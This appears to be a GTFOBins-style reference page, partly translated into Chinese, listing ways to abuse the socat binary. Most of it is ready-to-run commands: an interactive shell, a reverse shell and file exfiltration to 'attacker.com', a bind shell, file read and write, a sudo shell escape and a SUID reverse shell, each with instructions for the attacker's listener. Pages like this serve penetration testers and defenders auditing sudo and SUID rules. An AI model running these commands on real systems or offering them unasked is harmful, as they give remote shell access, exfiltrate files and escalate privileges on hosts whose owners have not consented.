.. / socat

shell

用来生成一个交互式的系统shell。

• The resulting shell is not a proper TTY shell and lacks the prompt.

  socat stdin exec:/bin/sh
  

reverse-shell

向监听的端口发送反向shell，以打开远程网络访问。

• Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on the attacker box to receive the shell.

  RHOST=attacker.com
  RPORT=12345
  socat tcp-connect:$RHOST:$RPORT exec:/bin/sh,pty,stderr,setsid,sigint,sane
  

bind-shell

将shell绑定到本地端口，以允许远程网络访问。

• Run socat FILE:`tty`,raw,echo=0 TCP:target.com:12345 on the attacker box to connect to the shell.

  LPORT=12345
  socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:/bin/sh,pty,stderr,setsid,sigint,sane
  

file-upload

上传文件到外部。

• Run socat -u tcp-listen:12345,reuseaddr open:file_to_save,creat on the attacker box to collect the file.

  RHOST=attacker.com
  RPORT=12345
  LFILE=要发送的文件
  socat -u file:$LFILE tcp-connect:$RHOST:$RPORT
  

file-download

下载远程文件。

• Run socat -u file:要发送的文件 tcp-listen:12345,reuseaddr on the attacker box to send the file.

  RHOST=attacker.com
  RPORT=12345
  LFILE=file_to_save
  socat -u tcp-connect:$RHOST:$RPORT open:$LFILE,creat
  

file-read

从文件中读取数据。

• LFILE=要读取的文件路径
  socat -u "file:$LFILE" -
  

file-write

将数据写入文件中。

• LFILE=要写入的文件
  socat -u 'exec:echo DATA' "open:$LFILE,creat"
  

sudo

如果二进制文件被 sudo 允许以超级用户身份运行，可能被用于访问文件系统、提升或维持特权访问。

• The resulting shell is not a proper TTY shell and lacks the prompt.

  sudo socat stdin exec:/bin/sh
  

limited-suid

suid是一种授予文件的权限类型，它允许用户使用者以文件所有者的权限来执行文件。

• Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on the attacker box to receive the shell.

  RHOST=attacker.com
  RPORT=12345
  ./socat tcp-connect:$RHOST:$RPORT exec:/bin/sh,pty,stderr,setsid,sigint,sane